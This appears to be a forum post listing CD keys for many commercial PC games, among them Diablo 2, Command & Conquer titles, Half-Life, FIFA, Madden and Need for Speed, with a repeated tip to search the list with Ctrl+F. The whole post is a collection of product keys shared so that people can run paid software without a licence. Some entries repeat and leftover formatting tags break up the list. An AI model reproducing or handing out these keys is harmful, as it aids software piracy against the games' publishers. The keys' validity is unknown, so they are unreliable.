6B4T-3BBC-DASD-D97Q-59HX N5E3-YXH2-G983-9WYB-B3ZS N7Q9-UX77-KZ3Z-332A-W4TR NTEG-6HCF-VU5D-HDMC-47S9 NMBP-8MX8-ESD4-RB7S-9HKZ Delta Force:Task Force Dagger ---------------- 7S5E-MVLM-NS6Y-4X64-HMAK 7NXF-L5VB-T2AX-KSR8-EHSH 743L-HGSU-SK5P-YCKS-HQLZ 72YL-R4SB-GKG6-3WKS-HQ27 Diablo 2 ---------------- 6PNP-D7PG-HZ8M-PZNP FX7D-82PH-FTWB-2BR2 2P8D-897Z-BNNJ-PJRM EBPE-F7XN-9HWC-K97K 496B-6N7G-RCV4-27EN Call of Duty: 82SH-E2WH-KPYY-EX8E-A14D[/b] Call of Duty: DEUD-WYDE-4W42-YKDW-F34D Call of Duty: WDWE-YW8Y-XWWD-TYWY-1EAF Call of Duty: TXSK-WGDY-WDSX-WPTW-1A7C C & C Generals: 1116-0553323-4206438-6378 C & C Generals: 1529-4165093-5283471-0961 C & C Generals: 1554-3519303-5863106-2960 C & C Generals: Zero Hour: AZNE-P748-W8C4-SSWS-4E8S C & C Generals: Zero Hour: PA7F-J4AX-TD9N-92FZ-4BUR C & C Generals: Zero Hour: PA7F-J4AX-TD9N-92FZ-4BUR C & C Generals: Zero Hour: PA7F-J4AX-TD9N-92FZ-4BUR C & C Red Alert 2: 020736-428526-011875-6507 C & C Red Alert 2: 022121-905624-825895-4992 C & C Red Alert 2: 030645-633345-452378-0580 C & C Red Alert 2 Yuri\'s Revenge: 303440-222764-534487-73438 C & C Red Alert 2 Yuri\'s Revenge: 662875-454133-344823-08464 C & C Red Alert 2 Yuri\'s Revenge: 075420-663711-111417-71038 C & C Renegade: 056894-929488-118387-9679 C & C Renegade: 056762-051968-047885-5190 C & C Renegade: 056968-762379-840140-8243 C & C Renegade: 056384-165067-858508-3234 C & C Renegade: 056120-230755-848844-5718 C & C Renegade: 056198-391485-391948-9024 C & C Renegade: 056924-738095-184588-5738 C & C Renegade: 056038-648693-313100-7109 C & C Renegade: 056493-234166-827916-2001 C & C Renegade: 056430-651581-593164-8339 C & C Tiberian Sun: 008302-889914-451062-6091 C & C Tiberian Sun: 010436-881681-537098-4027 C & C Tiberian Sun: 263877 906189 200291 2883 C & C Tiberian Sun: 266127 314485 240039 3713 C & C Tiberian Sun: 781866 616595 819275 5016 C & C Tiberian Sun: 781866 616595 819275 5016 Chaser: 52QJY-10K8V-CLNPI-1EISW-7VNP3 Chaser: 3RVXB-6ICGE-PYX7T-KJ9L9-LSG5H Chaser: 2QIMX-NU6MT-O74UI-D9OS0-XW4N5 Chaser: 63PRZ-360N5-7SWUY-XR0A5-DIFCA Chrome: MZIC3-MLNTS-VL45L-8MG26 Chrome: 53ZFH-CKE6T-3TPXJ-82W00 Chrome: XICVC-IZM6A-GTAHP-I4X6H Clive Barker\'s Undying: 2500-0911911-09 Commanche 4: 3s2d-flt1-cls2-rule-7865 Commanche 4: KGQJ-8M68-7JQW-DUCV-WLC6 Cricket Jr 3.2.25: Név: .:i2k:. System ID: .:i2k:. Kód: CJr1-94805-YZSVI-SQ6Lv Dark Age of Camelot: HAVDVIL-YATYBA9-WX18VXE-MP43QAQ-HUGUTMX Dark Reign 2: gad6-teb4-cup9-pap6-5529 Deep Raider: 102050000000001 Delta Force 2: JTUH-LTHD-BCZV-HFBY-SSNN Delta Force 3: N5E3-YXH2-G983-9WYB-B3ZS Delta Force 3: N7Q9-UX77-KZ3Z-332A-W4TR Delta Force Task Force Dagger: 72YL-R4SB-GKG6-3WKS-HQ27 Delta Force Black Hawk Down: Q96Y-LTGO-YVYE-GJBA-CWGV Delta Force Black Hawk Down: 88ER-GPOV-KCWM-EUPP-HLWP Delta Force Black Hawk Down: QKUG-DNPY-UAHT-HYFQ-LRDH Der erste Kaiser: RED2-DAD2-RAD2-DAD2-888 Devastation: 5B36F-976AA-6A471-58B8D-92B7B Devastation: GUHW6-TC9VN-IMSAA-9B162-6RBR9 Devastation: BQEE6-UWZM3-IMSSZ-6A2B1-3D5F3 Diablo 2: LOD 6PNP-D7PG-HZ8M-PZNP Diablo 2: 4CHW-RT4M-9JPN-2G4B Diablo 2: 6EPM-27Z9-99D2-KM7B Diablo 2: 79ER-XTM4-HNDK-DWE6 Diablo 2: 848J-XN72-9NZP-82FP Diablo 2: 879K-9G4N-B9CV-2CTK Diablo 2: 8DRR-VTH6-RGZ7-RT2V Diablo 2: B2PF-JGJ9-J74C-H7T2 Diablo 2: BFCT-F4MN-RCH7-RDCF Diablo 2: EJ6V-BT4D-9NDC-77TF Diablo 2: FBWG-8NME-GZDW-7H9E Diablo 2: GHXX-829D-2M9T-H48W Diablo 2: HJ4E-N2MJ-XHXP-NZXV Diablo 2: J2J8-MDKZ-8G47-4KXB Diablo 2: J9NC-FTHN-PC4N-7RHH Diablo 2: KDZD-DR7W-92DX-FR8J Diablo 2: KFJH-WDNF-HGXT-HEH6 Diablo 2: N64H-7J9X-JMCN-NG74 Diablo 2: NDGX-TGNK-XPGE-GGWR Diablo 2: PHFF-ZGZX-ZXKZ-2G7C Diablo 2: TBKJ-B79J-N6NJ-86MB Diablo 2: TPDC-HWNF-NVMV-VCXV Diablo 2: VV86-CGKN-EVBP-T7TC Diablo 2: WEJ2-X28V-R727-VC2T Diablo 2: WVE6-RTNC-TFHG-EVXP Diablo 2: XWMN-D97T-6E6H-TPM2 Diablo 2 LoD: HFCN-H9DD-PBGE-G9K9 Diablo 2 LoD: EV4D-GGRZ-8DVH-H9D4 Diablo 2 LoD: 6689-JDRR-B6DC-7WKZ Drome Racers: 0252-2798728-8952823-5920 Drome Racers: 2186-7410760-3617868-5920 Drome Racers: 2574-0811768-6410528-5503 Drome Racers: 1439-8808778-3837107-0023 Drome Racers: 3496-5109968-3484992-4129 Drome Racers: 5533-3743808-8068198-0827 Drome Racers: 9722-8289078-1586124-0933 Drome Racers: 2586-2653924-6182119-2114 Drome Racers: 7629-5200391-8195325-1003 Drome Racers: 2586-7722941-9698255-6023 Drome Racers: 4912-5083939-6799769-1518 Drome Racers: 3576-6582544-1616335-0011 Drome Racers: 5328-2536186-2146291-0234 Diablo 2: Lord of Destruction ---------------- FX7D-82PH-FTWB-2BR2 6PNP-D7PG-HZ8M-PZNP VCV9-N7RN-H9C4-VDBT M4ND-6TPT-GH4N-FCKX HCJJ-4DPH-988V-8HNN Doom 3 ---------------- 2DR3-ABTC-AJLB-BLJH-4C G4GE-JUMZ-BJYV-FEJU-02 WHUT-TLKX-PDV3-EAQ6-70 GURD-YVDJ-3LD2-W9Q8-91 MZK7-4LB8-42FJ-HCNA-75 Doom 3: Resurrection of Evil ---------------- PSBC-TASC-33WB-PH7L-C0 (Later...) T7LB-BD27-TWLC-SDGD-F6 Dope Wars ---------------- 373B30292B1131240889MI8770MMI7I573M288MH 2D3917122B2A1F380988M8890M85J9J773M28481 19123D212D19301C0I8M87MI0K84I7JI0H898884 15353C253A3A3A310I8MM8857387I7JM0I8J8581 381A3A3B151E1C18758987MH0K81I5I70IM48785 Drome Racers ---------------- 0252-2798728-8952823-5920 2186-7410760-3617868-5920 3496-5109968-3484992-4129 7629-5200391-8195325-1003 2574-0811768-6410528-5503 Empires: Dawn of The Modern World ---------------- CGAT-NPZZ-NZW8-NC8X-D096 THXH-39CZ-N898-TT44-5DF5 KH9W-AWGX-4J4H-48AP-53B1 XA9Z-4JW8-C9GN-KJGP-C490 8P49-PP4T-WGCX-KP33-FB7B Empire Earth ---------------- LES9-RUC2-TYM8-CEJ3-2727 TUS5-LEF6-TEM9-MER6-7453 NYR2-BAD2-GYM5-CEZ6-7337 RAN6-MUG2-SYJ2-GYL7-3385 Empire Earth: Art of Conquest ---------------- GER2-MAN2-RAP2-PER5-2252 BYB2-SAB8-WYZ5-DEB2-8489 TUS2-GAC4-BAM9-SUL6-8545 Emperor: Battle For Dune ---------------- 035921-492715-312032-5217 038351-947039-933217-1729 040222-570718-012757-3830 041392-991953-129963-0491 033312-198585-776746-4264 Emperor:Rise of the Middle Kingdom ---------------- BAC9-RAL8-SAS2-SAX2-9999 RED2-DAD2-RAD2-DAD2-8888 BAB2-DAD2-BAB2-DAD4-2247 GAG2-FAF2-GAG2-FAF5-2257 GAD2-ZUC2-GAD2-ZUC3-2225 F1 2001 ---------------- 0742-8228816-4870198-0680 3611-4905481-0068168-6105 5094-4170872-5161062-5968 8696-4686736-6168757-6367 7743-2166283-2840552-8106 F1 2002 ---------------- 2319-2017512-5876312-1450 4812-5611292-5122399-1214 9961-9180844-0056338-1331 6421-9723052-9340789-0414 0072-7944183-8202464-0356 F1 Challenge 99-02 ---------------- 2420-1755665-2896902-5443 5342-6345206-6715881-1712 7454-6168039-6622391-6613 0833-7134974-9213172-0365 8594-3514538-3685029-2547 FIFA 2002 ---------------- 4431-4955408-1776254-7055 6821-3066382-6339801-8786 0199-7350209-7377613-5972 7967-4956526-7887198-1118 1834-9368868-6082203-4882 FIFA 2003 ---------------- 68M5-3DEU-JU8S-M7HX 52JT-ZVDW-QNBH-2CRW K4LC-UKAW-CMDS-756J FY8E-E4GH-JF75-EKQ9 TDN9-TNW8-K9PG-8NXE FIFA 2004 ---------------- 2MGQ-WYAN-24DJ-XJBJ-AJE2 KUR9-QE7C-Y559-ZWC9-27Y8 WUEW-VGVM-AUP3-4YPC-CMJ5 MFPP-BWC8-LNFK-55WP-ZAZF HVDD-YMXN-UQAE-R4ZW-Z9AJ Hint:If you need a key and think that this list is too long and find it difficult to search.. Hit CRTL+F and type in the name of the Game,you\'ll be there 50,000 Cd Keys Of Pc Games [/size] FIFA 2005 ---------------- 7UMD-DH24-2RKP-DSAA-Y45Y 2K7X-4H5D-MLM8-6WJG-BR9H QE3K-Z3VT-QYS8-25B9-9WLM GVWW-A78X-NGTZ-BKTP-UBBY B9AJ-XBMB-DUSG-YVGR-7G3T FIFA World Cup 2002 ---------------- 7603-5024040-4434988-2569 7134-0040778-6000898-4059 0973-0765382-4012472-2529 3610-9093190-1324091-5676 6308-7762342-7527510-3056 Freedom Fighters ---------------- PLLC-8WAZ-TRSH-6QC7-NSCY PJ7F-GMAS-TRCU-4PUM-RUNH PR33-WMAH-TJV3-JSNE-8KL6 PX8G-CUAT-T6Z4-6G4T-QUHU P5JA-MUAV-TEW5-3A47-AJEZ Freedom Force ---------------- 1500-1925526-8586068-0454 9722-8289078-1586124-1727 5533-3743808-8068198-4528 4912-5083939-6799769-1163 2586-7722941-9698255-3753 Frontline Attack: War Over Europe ---------------- PNN6-G2N7-XR3B-AHT8 53XC-ZTHT-ARAP-SVBC FUBP-EYNZ-KFXC-SKM2 GSB3-4F9P-WSTV-SBU6 Full Spectrum Warrior ---------------- KCGG-EY77-SGNM-APC0 J9SK-7500-PDX0-36YY M5K8-9FC6-NU44-KSEY LLJC-L610-PDX0-0G0Y 4TPK-KV00-PDX0-4J1X Galactic Civilizations ---------------- DN-594680-GC1-9493F34F25 DN-461586-GC1-373C1A94E6 DN-452966-GC1-93CC8CBB06 DN-658465-GC1-CE38B1CC5E DN-155418-GC1-7C53C8930F Galactic Civilizations: Altarian Prophecy ---------------- DN-ULTQD7-AP1-D76BQCK297 DN-DCQ632-AP1-32URD7JGFT DN-M27KBT-AP1-BTQX34FMFJ DN-YJHMB4-AP1-B458GTZNJA DN-L2UK39-AP1-396AP57XYE Gangland ---------------- PC73B-DQ34J-MJJF8-S86QC-1PMHS-K 34T9D-7LVRJ-2GCD7-GPGTT-D6Q5H-C BBM4D-1LIU6-5C781-1EQ7L-6F4RU-C 3RTHF-IMPHI-HBP9V-UV7EM-T74C6-S FQAI4-PP6P6-R9P1C-V8CTF-MBLKM-4 Global Operations ---------------- 7589-5021487-6662554-0413 5162-3570489-6270304-3721 0428-8668125-5725123-2300 0038-2227195-9496720-0349 [b]8951-0466909-8060897-6524[/b] [b]Gore: Ultimate Soldier[/b] [b]----------------[/b] [b]6B95-AE91-9C13-E72A[/b] [b]1FFE-F2C7-0D04-F2B5[/b] [b]7FFC-A922-F489-6890[/b] [b]8003-4FFB-A603-7D16[/b] [b]2006-F662-A704-0B9F[/b] [b]Haegemonia[/b] [b]----------------[/b] [b]B5BB-C23D-BABB-0A63[/b] [b]A06B-C3B9-04D7-DEC6[/b] [b]FB8D-AAC3-B021-842E[/b] [b]E2BE-0C46-7912-DAC8[/b] [b]5848-09CC-710C-DA78[/b] [b]Haegemonia: The Solon Heritage[/b] [b]----------------[/b] [b]686E-7C7C-A117-2016[/b] [b]8F46-F170-F975-EDEB[/b] [b]085A-3424-CD86-62D6[/b] [b]4AF1-5863-C80F-C0FC[/b] [b]92EF-14B2-DA69-8D69[/b] [b]Haegemonia: Legions of Iron[/b] [b]----------------[/b] [b]BAD0-DAD0-5000-8113[/b] [b]BAD9-DAD9-5001-A112[/b] [b]BAD8-DAD8-5002-8112[/b] [b]BAD7-DAD7-5003-6113[/b] [b]DEAD-1870-5004-4538[/b] [b]Halo: Combat Evolved[/b] [b]----------------[/b] [b]K9TGM-K337P-JW24T-B9V73-C3TVW[/b] [b]T39RX-JH7Y2-XWTJD-VJX8X-G7MD8[/b] [b]VM324-F4K8W-B9CKB-79KH2-F2CBJ[/b] [b]8D69D-8BFB8-93949-5845F-FH686[/b] [b]G9Qk2-22KV6-TFXCR-V3Y9M-2CCBJ[/b] [b]Half Life[/b] [b]----------------[/b] [b]7060-92221-2785[/b] [b]5531-10604-0817[/b] [b]2837-26196-8502[/b] [b]9464-54350-6230[/b] [b]3728-42526-5629[/b] [b]Half Life 2[/b] [b]----------------[/b] [b]2489-72270-3566[/b] [b]2133-52724-9483[/b] [b]2538-92371-0140[/b] [b]Half Life: Blue Shift[/b] [b]----------------[/b] [b]1911-23143-1234[/b] [b]2691-13570-3628[/b] [b]0373-03700-6727[/b] [b]2375-73472-8605[/b] [b]2884-52653-7164[/b] [b]Half Life: Game of the Year Edition[/b] [b]----------------[/b] [b]4336-04196-6119[/b] [b]0104-23136-0366[/b] [b]2844-42442-1488[/b] [b]Half Life: Gunman Chronicles[/b] [b]----------------[/b] [b]2609-57245-0368[/b] [b]5826-95445-8263[/b] [b]1073-74181-0735[/b] [b]2147-48362-1470[/b] [b]Half Life: Initial Encounter[/b] [b]----------------[/b] [b]0176-11134-0245[/b] [b]Harry Potter: The Sorcerer\'s Stone[/b] [b]----------------[/b] [b]1683-0816698-0377119-7214[/b] [b]6496-1733723-6070637-7107[/b] [b]4500-0980084-7751600-3013[/b] [b]4512-9289626-4382245-6218[/b] [b]0901-7014788-4117807-0206[/b] [b]Harry Potter: The Chamber of Secrets[/b] [b]----------------[/b] [b]4160-6358666-6112312-0619[/b] [b]3614-7054629-4776456-8022[/b] [b]7954-3123341-1387427-3052[/b] [b]1740-9488245-5171152-5225[/b] [b]7614-2322168-5761892-3635[/b] [b]Harry Potter: The Prisoner of Askaban[/b] [b]----------------[/b] [b]DAD5-WEZR-BCLF-2AJ7-YDEV[/b] [b]5RYQ-LVAY-D2AL-GCG6-RSIG[/b] [b]JN8G-EJXA-U74Y-SMTF-FDEV[/b] [b]RSDV-EMCU-DJ7A-5XDG-FDEV[/b] [b]F755-4A6S-8P4B-SVJN-WKXC[/b] [b]Harry Potter: Quidditch World Cup[/b] [b]----------------[/b] [b]JFZR-TQFB-KWUB-THB2-2DEV[/b] [b]J7XP-URTU-JHSM-AMET-3DEV[/b] [b]V6BT-9KK2-4L4F-BE4N-7DEV[/b] [b]UGLC-5YAG-4E8J-6GWC-ADEV[/b] [b]2N44-JSJX-E8GY-7E24-NDEV[/b] [b]Harry Potter Creator[/b] [b]----------------[/b] [b]1833-7294628-2636387-0935[/b] [b]9892-9785252-5145166-0281[/b] [b]1918-0521792-6030058-2238[/b] [b]2776-8297169-5787269-0335[/b] [b]4914-5375251-9672268-2287[/b] [b]Hidden & Dangerous 2[/b] [b]----------------[/b] [b]8397-C085-DD82-E7E7[/b] [b]2787-C24C-A1E0-53C6[/b] [b]C3D2-DD00-88AD-FAAA[/b] [b]8439-D1DB-8D71-E6F8[/b] [b]4C53-3877-5831-D1EE[/b] [b]HomeWorld[/b] [b]----------------[/b] [b]BED2-BYS4-FEB2-TUL3-6653[/b] [b]BAG5-LEJ3-MAN7-SUL2-3696[/b] [b]BYS8-PUM2-TAB4-SUS2-6799[/b] [b]DAC5-XAB6-DAF6-CYW2-7965[/b] [b]DAC6-PAB2-FAF8-XAB7-4428[/b] [b]HomeWorld 2[/b] [b]----------------[/b] [b]FAG8-SUL8-NEL7-BYS8-3526[/b] [b]MAT8-LEZ9-NEN2-GUN2-4382[/b] [b]RAG7-BAM2-NEN2-WAM5-4765[/b] [b]WEW6-SUB2-MEN9-JAG8-7564[/b] [b]BEJ6-JEN3-MEB8-FUS7-8255[/b] [b]Industry Giant 2[/b] [b]----------------[/b] [b]BBKD-66NY-YTYY-85A5[/b] [b]BGNH-00IJ-MIEM-3A0F[/b] [b]ODLM-41AZ-MRRC-605A[/b] [b]OUUG-64BX-YLHZ-8BF0[/b] [b]VXOU-05ON-IOKT-8B3C[/b] [b]Island Xtreme Stunts[/b] [b]----------------[/b] [b]0969-4261038-0869656-4504[/b] [b]9483-0466288-8358793-0118[/b] [b]8489-6628363-7803262-5521[/b] [b]3041-7547168-8872139-2519[/b] [b]7126-6190880-4799523-6008[/b] [b]James Bond 007: Nightfire[/b] [b]----------------[/b] [b]8583-8951762-8789811-0551[/b] [b]6409-3390867-1486320-3107[/b] [b]7086-3754973-3585481-3827[/b] [b]7330-6713941-5762780-2731[/b] [b]6953-0066911-8667463-6034[/b] [b]Joint Operations: Typhoon Rising[/b] [b]----------------[/b] [b]T2G2-MLET-XDZP-N462-HVTY[/b] [b]TWDD-M96W-HGUK-3EUM-9PVP[/b] [b]TTX3-PDZ3-EBNT-MLV4-M7L8[/b] [b]BD4U-4J7E-GU9W-54EW-7FL9[/b] [b]B4US-MPH4-4MF2-8E6G-GHQV[/b] [b]Joint Operations: Escalation[/b] [b]----------------[/b] [b]UT6B-VHA3-CWG6-SQAQ-YTNQ[/b] [b]U8RK-L58Q-5KT5-2JZZ-3RLD[/b] [b]UJC9-9S7A-4AAG-S368-4RLD[/b] [b]UFRL-PKPR-DKZ7-EUKD-4RLD[/b] [b]CLNZ-JRPZ-7MB2-SXR9-ERLD[/b] [b]Kuma War: The War on Terror[/b] [b]----------------[/b] [b]KUMA-A1A1-RDB8-QT7N[/b] [b]KUMA-A1A1-SYC5-FPSS[/b] [b]KUMA-A1A1-QHVF-Z2BE[/b] [b]KUMA-A1A1-3BWU-9TPK[/b] [b]KUMA-A1A1-VP97-74MG[/b] [b]LFP Manager 2003[/b] [b]----------------[/b] [b]7328-2480257-0244355-5107[/b] [b]7482-1812758-3422583-3701[/b] [b]7905-6392110-3161013-6330[/b] [b]3454-4263670-1186145-9527[/b] [b]0097-2243568-0597047-5217[/b] [b]LFP Manager 2004[/b] [b]----------------[/b] [b]AH88-W6PR-GPSV-FZU6-7U3B[/b] [b]EB8Y-444N-LW3M-Y9ZL-TJLB[/b] [b]3YZZ-9KQR-EPEZ-5DFD-MAL9[/b] [b]WGC4-2WG9-N2ME-RSTS-BTK3[/b] [b]SSUL-6UFH-PSEB-RNYG-9NNE[/b] [b]LFP Manager 2005[/b] [b]----------------[/b] [b]CLJ2-65FT-BQYE-M4Q8-26KL[/b] [b]AQK3-3PCF-BCWQ-MB2T-784Z[/b] [b]93AA-TA8B-PRGZ-6ZU7-26G6[/b] [b]PZ5D-ACN6-K394-7VA5-RZGX[/b] [b]AFX7-YPLS-5N8H-D8RP-VXAZ[/b] [b]LNF Manager 2002[/b] [b]----------------[/b] [b]8177-4697410-7880055-5922[/b] [b]1226-2217367-1677912-2907[/b] [b]4433-0243807-1153203-0630[/b] [b]9023-5088341-8439224-3278[/b] [b]4252-5541128-1310507-1121[/b] [b]Madden NFL 2002[/b] [b]----------------[/b] [b]4388-4795175-8346580-6915[/b] [b]7842-9734988-8129955-2948[/b] [b]1599-3986956-1129944-5344[/b] [b]5061-4242349-9616848-7641[/b] [b]3674-0074010-6203959-8425[/b] [b]Madden NFL 2003[/b] [b]----------------[/b] [b]SGAQ-AL6E-B4UY-YB8S[/b] [b]BPRK-PZHF-THEF-J8WX[/b] [b]4AN6-FQZG-L2RY-L2QR[/b] [b]LEX4-WZJ2-NY2A-UAF8[/b] [b]QS42-5HYC-E95L-FBZ9[/b] [b]Madden NFL 2004[/b] [b]----------------[/b] [b]PUY8-DB6R-JN4P-HSJK-W594[/b] [b]DVL4-3KLA-AQFJ-V2NZ-SJE3[/b] [b]SH9H-XVYJ-UFND-5E9G-89P6[/b] [b]PDHZ-TNFP-WVGL-QUN5-L64V[/b] [b]ZJMD-K4A5-KUY9-2XUP-2RTM[/b] [b]Madden NFL 2005[/b] [b]----------------[/b] [b]4LLL-XJ4H-PQV2-82AB-BF8Z[/b] [b]MRKK-A5HD-8GWR-Q4PL-EYUT[/b] [b]P6VV-BGDQ-UASC-8YPB-PHMV[/b] [b]UP44-FXDM-TUBS-Y7WJ-T3P7[/b] [b]ZRE6-4G64-C63W-GBUH-CR35[/b] [b]Matrix: Online[/b] [b]----------------[/b] [b]1552-5638-1558-1337-N008[/b] [b]Hint:If you need a key and think that this list is too long and find it difficult to search..[/b] [b]Hit CRTL+F and type in the name of the Game,you\'ll be there[/b] [b]50,000 Cd Keys Of Pc Games[/b] [b][/b][/b] [b]Medal of Honor: Allied Assault[/b] [b]----------------[/b] [b]6637-0880151-9362063-6529[/b] [b]1031-5864656-7758949-7569[/b] [b]6376-9736948-9267793-2214[/b] [b]0536-0826759-9189244-5770[/b] [b]6942-3862662-1619177-7525[/b] [b]Medal of Honor: Spearhead[/b] [b]----------------[/b] [b]3426-7701639-7250778-4418[/b] [b]7894-0307736-4309059-4706[/b] [b]5637-6168520-8827988-2546[/b] [b]7930-5111169-1502526-4140[/b] [b]8322-6613419-9951137-2000[/b] [b]Medal of Honor: Breakthrough[/b] [b]----------------[/b] [b]KE2S-CX95-EMXH-QQTX-RX4N[/b] [b]2BBT-LVTJ-S324-HC3S-PE4U[/b] [b]4UQY-UC2U-FVFP-VTYU-JTBE[/b] [b]3LP7-ZL59-ENHM-PYCU-AULJ[/b] [b]76ZR-4ATE-6TYQ-KWPD-F9RL[/b] [b]Medal of Honor: Pacific Assault[/b] [b]----------------[/b] [b]XXHR-729P-Y8LP-59JC-BRQJ[/b] [b]J2HH-PNUD-CXFK-MSWM-RWEM[/b] [b]BUW6-8FLA-8L8G-WZZM-FJ64[/b] [b]DBSJ-AEN4-UMQL-V4V5-WK72[/b] [b]SNLU-BAMU-LP3L-KSFE-JRLD[/b] [b]MVP Baseball 2003[/b] [b]----------------[/b] [b]PH4N-BTHK-GVRC-D5T5[/b] [b]HZ8U-L2C3-AWU2-2Y4L[/b] [b]R39T-5LC7-XJRF-RF37[/b] [b]D9PP-EN4V-NCT8-2W34[/b] [b]2BVH-BEY8-8C6N-YHC2[/b] [b]MVP Baseball 2004[/b] [b]----------------[/b] [b]BM2S-5J8R-5YP9-XZMT-LZHU[/b] [b]TC9R-G4JF-ZHS4-K7ER-B3QS[/b] [b]RHH9-V4RD-QGJT-L34U-37B7[/b] [b]GP99-T9WU-TTMA-JYQK-MGX2[/b] [b]Z5H9-Y5S3-F7PA-KB69-DVES[/b] [b]NASCAR Thunder 2003[/b] [b]----------------[/b] [b]HWAW-BV8D-WYBA-V8D6[/b] [b]ZFAP-Y3JF-9TSD-H43M[/b] [b]YHKZ-BZJN-JLV8-2HV3[/b] [b]NW9E-V9H7-7EQD-3CMG[/b] [b]J34K-Y3BF-TS9E-QBBL[/b] [b]NASCAR Thunder 2004[/b] [b]----------------[/b] [b]B555-L2LP-NBZG-TTQF-ST7L[/b] [b]U4WN-Q7ZV-NM6S-DN77-JNRF[/b] [b]XJZR-KR3L-QFSP-56AJ-3R2Z[/b] [b]BR8Y-CRR7-KJD5-7DYQ-9NXR[/b] [b]QK88-A8B2-P5M7-AM7G-8SRM[/b] [b]NBA Live 2001[/b] [b]----------------[/b] [b]0011-8452748-8024535-5394[/b] [b]6068-4424851-7616042-3649[/b] [b]8644-4406490-5087796-6029[/b] [b]6576-6946899-5075485-0232[/b] [b]3045-2927629-1069868-2592[/b] [b]NBA Live 2003[/b] [b]----------------[/b] [b]EVXM-E7YN-XLQF-L36C[/b] [b]RTMR-4CCL-J5PB-2YX6[/b] [b]SF69-RKN7-LXNS-3X72[/b] [b]YHH3-6544-T632-KF8C[/b] [b]5CH5-JZXR-YRL2-9EZW[/b] [b]NBA Live 2004[/b] [b]----------------[/b] [b]MVNE-PPV4-EHNA-WTFD-LC9K[/b] [b]3DGQ-2DUC-YSFK-KC36-P9JD[/b] [b]5P8Y-Z8J2-XAYC-CFZ9-72WF[/b] [b]YHA2-9VEB-K9AC-D22F-HVKJ[/b] [b]YHE6-BVBK-QNVE-RU45-3N9V[/b] [b]NBA Live 2005[/b] [b]----------------[/b] [b]AYJ2-JCQD-W875-3CV7-4GQ7[/b] [b]J7BB-LRTP-GJUV-Q99D-3B85[/b] [b]X3D5-55JU-7B77-SW4Y-FC5U[/b] [b]3RFF-5ZSJ-5ZYT-LNDX-PNP8[/b] [b]8ZBB-TSZE-Q249-N9EV-8EM6[/b] [b]Need for Speed 3: Hot Pursuit[/b] [b]----------------[/b] [b]8249-7EE3-84EW-TXGT[/b] [b]Need For Speed 5: Porsche Unleased[/b] [b]----------------[/b] [b]14077-BUSY-CODA-CALF-BIFF[/b] [b]14077 BUSY DUNK BEAN FROG[/b] [b]14077-BUSY-HEED-GONE-FALL[/b] [b]14077-TOYS-PORK-SHOP-TEST[/b] [b]14077-TOIL-RULE-FIRE-TEND[/b] [b]Need for Speed 6: Hot Pursuit 2[/b] [b]----------------[/b] [b]2C7L-HZKL-3VNA-JJZF[/b] [b]8249-7EE3-84EW-TXGT[/b] [b]9YGT-BX7S-S6GS-PBNQ[/b] [b]XTJY-7PS2-CAJ2-A7EX[/b] [b]WUQ3-4ALW-BM23-DU6B[/b] [b]Need for Speed: Underground[/b] [b]----------------[/b] [b]F6LL-LZPR-5PUD-R9WL-VJKZ[/b] [b]NX7F-NB87-NG5F-U2WS-7HNF[/b] [b]NM8G-HDRK-S72T-EYL4-WXUR[/b] [b]PD7P-MW9T-UTDU-BDFS-L6YL[/b] [b]H9CC-23EM-2L3K-LC98-5DEV[/b] [b]Need for Speed: Underground 2[/b] [b]----------------[/b] [b]NSE6-R8BA-G8QG-L5VU-L2A9[/b] [b]S8NN-99CK-KUL3-L38W-VEYB[/b] [b]KXZ9-R2L4-K4S9-CQDM-K9A9[/b] [b]KY7X-8LLB-3H8F-N4KG-D8JH[/b] [b]ZY5V-X9EE-J4EL-AMC5-RLD0[/b] [b]Neverwinter Nights[/b] [b]----------------[/b] [b]QFETM-MPU3X-DN6FF-MHFDA-YWARA-4HMPE-RDJTG[/b] [b]UYLVL-UDRG9-U73FN-L7Y4J-YPFLT-PNPP4-VHCTL[/b] [b]QXHRE-LYWHW-MYRJD-7W9YJ-NPT9W-LMTWF-9ERAE[/b] [b]Neverwinter Nights: Shadows of Undrentide[/b] [b]----------------[/b] [b]4YU9C-DUTT9-JFH3C-766UM-QF6N3-DHATY-3VMQM[/b] [b]RX4KP-Y6P9Q-6H6PL-GRCK7-FFP7G-PJ64E-DA9J6[/b] [b]FAQC4-X9K4G-EVDUX-HAGAL-QNP4X-34CNX-ECADC[/b] [b]9XEWK-AGG9L-TYF7M-693RY-HU3EQ-HDUD3-GR3JV[/b] [b]J7NPQ-FAECQ-J7WTM-GRRGW-EUQVG-QCEY3-P4YAE[/b] [b]NHL 2002[/b] [b]----------------[/b] [b]5889-4495387-1059328-2260[/b] [b]3842-7577253-5843711-4677[/b] [b]1699-8072617-0717944-1453[/b] [b]9502-8526562-9903425-7554[/b] [b]7116-0792531-1951672-8869[/b] [b]NHL 2003[/b] [b]----------------[/b] [b]EWSE-7JU8-NA6Q-W4VP[/b] [b]BMQW-BQ4K-YVCW-QH58[/b] [b]977A-8A2D-7SH8-VY2B[/b] [b]WAAH-RTTQ-NBJW-4TAE[/b] [b]2874-BCNZ-RREY-9HU3[/b] [b]NHL 2004[/b] [b]----------------[/b] [b]6TGG-H3PB-Q7U4-H3KD-JM42[/b] [b]KP5V-2TDD-DNC9-JY2U-XHQW[/b] [b]AMAJ-VZUH-LG2A-NFMF-FNQW[/b] [b]PANE-VUTQ-KM3A-8E4E-XBUN[/b] [b]N5VM-FS2Z-5P39-8BR3-NQDJ[/b] [b]NHL 2005[/b] [b]----------------[/b] [b]8MH9-7X8P-KW3Q-SZUS-YXSH[/b] [b]3PWN-XMNM-M35A-QC2V-5LWB[/b] [b]PFU4-9AEW-8BTN-WPAT-UBQN[/b] [b]QZEN-XFFS-XZS4-9LCY-UB6C[/b] [b]4JHR-N3FY-4M6K-RWVE-2S2B[/b] [b]No One Lives Forever 2[/b] [b]----------------[/b] [b]GUZ7-PYW8-FUR6-DEG3-9399[/b] [b]FYJ9-FEF8-PEZ4-LUN2-6472[/b] [b]RYX8-MEF3-LEW2-ZEP2-7834[/b] [b]TYX9-WYG4-LUD8-MED2-6573[/b] [b]GEG8-XUX6-MUT7-PYP6-2647[/b] [b]Nox[/b] [b]----------------[/b] [b]017896-376549-071924-5507[/b] [b]017934-718048-114782-5775[/b] [b]017988-148677-811020-0366[/b] [b]017989-190334-175336-2528[/b] [b]018242-676109-162214-8592[/b] [b]Operation Flashpoint: Resitance[/b] [b]----------------[/b] [b]KMV6-47KHD-031KX-N9EGY-EMFLG[/b] [b]DZF5-J3KC6-BA3X6-1HCTR-PDK27[/b] [b]C6GB-C35F1-3HDKC-WW5J3-2Y0VZ[/b] 